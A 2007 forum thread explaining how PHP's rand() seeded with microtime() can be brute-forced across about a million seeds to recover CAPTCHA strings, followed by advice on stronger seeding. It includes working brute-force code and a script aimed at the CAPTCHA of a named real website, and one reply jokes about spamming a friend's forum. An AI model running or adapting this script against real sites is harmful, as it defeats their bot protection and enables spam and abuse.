02-06-2007   #1
PHP rand: A Look at Security

Hey guys,

I work a lot with web applications, using a few technologies, one of which is PHP. Every so often a web application needs random data: to generate a password or unique ID, a temporary filename, or a CAPTCHA image.

For the purpose of this post I am going to focus on the CAPTCHA use.

What is a CAPTCHA?
CAPTCHA stands for 'Completely Automated Public Turing test to tell Computers and Humans Apart'. You might know them best as 'Type what you see in the image above' tests. Ignoring attacks based on text recognition, I want to talk about an attack on them through rand() and srand().

First, a brief on PRNGs. Pseudo-random number generators generate sequences of (pseudo) random numbers. They start from an initial seed and generate numbers from there. One thing to remember is that the same PRNG algorithm with the same seed will generate the same sequence of random numbers (we shall use this in our attack). Therefore you must pick a seed with a strong degree of randomness; the seed is one of the weakest points, and with a predictable seed your rand is less... rand.

OK, so in PHP we have the function srand(), which sets the seed for our PRNG, and then successive calls to rand(), which let us extract random numbers.
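To make the "same seed, same sequence" point concrete, here is a minimal sketch. The helper name first_outputs() is made up for illustration and is not part of PHP.

```php
<?php
// Hypothetical helper: seed the PRNG, then collect the first few rand() outputs.
function first_outputs($seed, $count = 3)
{
    srand($seed);
    $out = array();
    for ($i = 0; $i < $count; $i++) {
        $out[] = rand();
    }
    return $out;
}

// Two runs with the same seed yield identical sequences.
$a = first_outputs(1234);
$b = first_outputs(1234);
var_dump($a === $b);
```

Anyone who learns or guesses the seed can replay every "random" value the application produced after seeding.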

*** NOTE ***
As of PHP 4.2 the random number generator is automatically seeded for you; however, applications generally do one of two things:
1) They still srand()
2) They check the version of PHP and will srand() for versions < 4.2

So clearly this attack applies to apps that call srand() (there is a caveat). Oh yes, the way PHP automatically seeds rand is with the following macro:

#define GENERATE_SEED() ((long) (time(0) * getpid() * 1000000 * php_combined_lcg(TSRMLS_C)))

Now, I have not had a chance to look at this closely (too much uni work), but it suffers from the flaw that time(0) is predictable, getpid() has a very small space, and, looking at the code, php_combined_lcg relies on the PID and system time AS WELL!

***
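The version check mentioned in the note usually looks something like the sketch below. The function name legacy_seed_if_needed() is hypothetical; version_compare() and PHP_VERSION are standard PHP.

```php
<?php
// Hypothetical helper showing the common "seed only on old PHP" pattern.
// Returns true if it seeded manually, false if PHP seeds automatically.
function legacy_seed_if_needed()
{
    if (version_compare(PHP_VERSION, '4.2.0', '<')) {
        // The weak, clock-based seed discussed in this post
        srand((int) ((float) microtime() * 1000000));
        return true;
    }
    return false;
}

var_dump(legacy_seed_if_needed());
```

Apps written this way are only exposed to the seed brute force on the old interpreters where the branch actually runs.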

Now it is suggested, and most developers abide by this suggestion, that you seed your rand using:

(double) microtime() * 1000000

This is a bad idea as it relies on the system clock, a highly predictable and accessible number.
It is also misleading: microtime() returns the system time to within a millionth of a second, and the cast keeps only the fractional part, so our search space is only 1,000,000 values (TINY).
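A quick way to see how small that space is: sample the seed expression above a few thousand times and look at the range. This is only a sketch, and microtime_seed() is a made-up name.

```php
<?php
// Hypothetical helper: the seed value the common idiom would produce right now.
function microtime_seed()
{
    // microtime() returns a string like "0.12345600 1180778400";
    // the float cast keeps only the leading fractional-second part.
    return (int) ((float) microtime() * 1000000);
}

$min = 1000000;
$max = -1;
for ($i = 0; $i < 5000; $i++) {
    $s = microtime_seed();
    $min = min($min, $s);
    $max = max($max, $s);
}

// Every sample lands in 0 .. 999999, i.e. just under 20 bits of seed.
echo "min: $min, max: $max\n";
```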

Now what's the attack?

Simple: we can seed the rand with every value from 0 to 999999, and one of them will be the correct seed. (It may actually get better. I wonder whether all of those values are evenly distributed, because I'm guessing they aren't.)
Once we have done this, we can check the output of successive calls to rand(). For example, say the following code generates an MD5 hash from the first rand() output and then generates a random string for a CAPTCHA image:

PHP Code:
<?php
// Standard way people are suggested to seed the rand in PHP (pre 4.2)
srand((double) microtime() * 1000000);

// The hash is taken from the first rand() output
$hash = md5(rand());

// Create a random string
$string = '';
$available = 'ABCDEFGHJKLMNPRSUVWXYZ23456789';
for ($i = 0; $i < 5; $i++)
{
    $string .= $available[rand(0, strlen($available) - 1)];
}

echo 'String: ' . $string . "\n";
echo 'Hash: ' . $hash;

?>
Now the idea is we know the $hash but not the $string... how can we determine it?... Like this:
PHP Code:
<?php
/*
 * microtime() is only so accurate:
 * 0.xxxxxx00
 * which means we check 1,000,000 values.
 *
 * A common way of seeding the rand is microtime() * 1000000.
 * This reduces microtime to 1,000,000 values, 000000 - 999999,
 * so we want to check all 1,000,000.
 */
$md5 = '3f0d74d70f574dafb255cd3efd0163ef';
for ($i = 0; $i < 1000000; $i++)
{
    // Re-seed with the candidate and reproduce the first rand() call
    srand($i);
    $x = md5(rand());
    if ($x === $md5) {
        echo 'Hash Found...' . "\n";

        // Figure out the random string: the PRNG is now in the same
        // state the target was in right after it computed its hash
        $string = '';
        $available = 'ABCDEFGHJKLMNPRSUVWXYZ23456789';
        for ($j = 0; $j < 5; $j++)
        {
            $string .= $available[rand(0, strlen($available) - 1)];
        }
        echo 'String: ' . $string;
        echo "\n";
        break;
    }
}
?>
And there, by brute forcing the seed space, we have found the original string.
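For anyone who wants to try the whole round trip locally, the two scripts above can be folded into one self-contained sketch. The function names generate_captcha() and recover_captcha() and the $maxSeed parameter are my own, added so the search can be kept small while testing.

```php
<?php
// Mirrors the generator above: hash of the first rand(), then 5 characters.
function generate_captcha($seed)
{
    $available = 'ABCDEFGHJKLMNPRSUVWXYZ23456789';
    srand($seed);
    $hash = md5((string) rand());
    $string = '';
    for ($i = 0; $i < 5; $i++) {
        $string .= $available[rand(0, strlen($available) - 1)];
    }
    return array('hash' => $hash, 'string' => $string);
}

// Tries every seed below $maxSeed until the first rand() output hashes
// to the known value, then replays the generator to get the string.
function recover_captcha($hash, $maxSeed = 1000000)
{
    for ($seed = 0; $seed < $maxSeed; $seed++) {
        srand($seed);
        if (md5((string) rand()) === $hash) {
            $found = generate_captcha($seed);
            $found['seed'] = $seed;
            return $found;
        }
    }
    return null; // no seed in the searched range matched
}

// Pretend the server seeded with 4242 and leaked only the hash.
$target = generate_captcha(4242);
$found = recover_captcha($target['hash'], 10000);
echo 'Recovered string: ' . $found['string'] . "\n";
```

The attacker never needs the exact time of the request, only the fact that the seed is one of a million values.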

Now, I have actually found an example of a poor CAPTCHA, and as I'm slightly tinged (read: gray) hatted I AM going to post it (admins can use their discretion if they want to edit this part of my post).

*** A Real Attack ***

The following captcha can be attacked with our approach (actually an even easier attack exists, but that's a little too easy, so I'll let you figure that one out yourself).

The following image is an example of the captcha I was talking about:
http://lansuite.orgapage.de/ext_scripts/captcha.php

When this image is loaded it sets a cookie on your machine with its very own captcha ID. We can take this and work backwards. The following code will do this for the captcha supplied:

PHP Code:
<?php

/*
http://lansuite.orgapage.de/?mod=picgallery&action=show&step=2&file=/sitzplan.png&page=0
http://lansuite.orgapage.de/ext_scripts/captcha.php
*/

// The captcha ID from the cookie, passed on the command line
$md5 = $argv[1];
for ($i = 0; $i < 1000000; $i++)
{
    srand($i);
    // Rebuild the captcha text: first 5 hex characters of md5(rand()), upper-cased
    $x = md5(rand(1000, 99999));
    $x = substr($x, 0, 5);
    $y = strtoupper($x);
    // The cookie holds the md5 of that text
    $x = md5($y);
    if ($x === $md5) {
        echo 'Hash Found...' . "\n";

        // Figure out the random string
        $string = $y;
        echo 'String: ' . $string;
        echo "\n";
        break;
    }
}
?>
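The easier attack is left unstated in the post. One shortcut that follows directly from the script above, and which may or may not be the one meant, is that rand(1000, 99999) can only return 99,000 different values, so the seed does not need to be searched at all. A sketch, with made-up function names and the captcha derivation assumed from the script above:

```php
<?php
// Assumed derivation of the captcha text, inferred from the attack script.
function code_from_value($n)
{
    return strtoupper(substr(md5((string) $n), 0, 5));
}

// Walks every possible rand(1000, 99999) output instead of every seed.
function recover_code($cookieHash)
{
    for ($n = 1000; $n <= 99999; $n++) {
        $code = code_from_value($n);
        if (md5($code) === $cookieHash) {
            return $code;
        }
    }
    return null; // cookie was not produced by this scheme
}

// Local round trip: build a cookie value ourselves, then recover the text.
$cookie = md5(code_from_value(31337));
echo 'String: ' . recover_code($cookie) . "\n";
```

This is roughly a tenth of the work of the seed search and works no matter how the PRNG was seeded.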
N.B. PHP uses common C functions for its rand so we can actually write a C program to do this... which would also run faster.

Suggestions to be Safe
OK guys, now about prevention. Firstly, use mt_rand(); it is a stronger, more random algorithm. But as you have seen, even if you did, you would still fall to this attack. You need to at least attempt to have a strong seed, and this is VERY hard to do. Clearly PIDs and times are horrible, but we don't generally have access to much else.

I guess my suggestion would be this.

Every hour, maybe, seed a random number generator (a strong one) with a good seed. This seed could be composed of system microtime, system time, system date and PID (yes, I know, this is weak) WITH some added data: maybe network data, uptime, users logged in, network activity, CPU activity, hard drive seek times, network latency and bandwidth (again, all not so good). And lastly with some good data:
maybe data from http://www.fourmilab.ch/hotbits/ which is based on radioactive decay.

Once you have this seed, seed a strong PRNG and then pull sequences either directly out of this or seed another PRNG with values from this PRNG.
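For readers on newer PHP: this is not the seeding scheme described above, but PHP 7.0 and later ship random_int() and random_bytes(), which draw from the operating system's cryptographically secure generator, so there is no application-chosen seed to brute force. A minimal sketch of the CAPTCHA string built that way (secure_captcha_string() is a made-up name):

```php
<?php
// Hypothetical helper: same alphabet as the examples above, but each
// index comes from random_int() (PHP >= 7.0) instead of a seeded rand().
function secure_captcha_string($length = 5)
{
    $available = 'ABCDEFGHJKLMNPRSUVWXYZ23456789';
    $string = '';
    for ($i = 0; $i < $length; $i++) {
        $string .= $available[random_int(0, strlen($available) - 1)];
    }
    return $string;
}

echo secure_captcha_string() . "\n";
```

Whatever generator is used, the expected answer is better kept server-side (for example in the session) than handed to the client as a hash of a short string.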

I hope this has opened some eyes.

Cheers, now I'm off to San Francisco for WWDC!
Last edited by Khaless; 02-06-2007 at 05:17 PM..
02-06-2007   #2
chemicalNova

Nice read. Interesting how web developers actually have to take into account that pseudo-random generators aren't foolproof... for games it doesn't really matter

Have fun at the convention.. lucky bastard

chem
03-06-2007   #3
Twelve-60

Yeah, that was interesting. I'd heard a bit about it but never really looked into it much. Time to spam my friend's home-made forums

.. for security notice purposes only.

- Twelve-60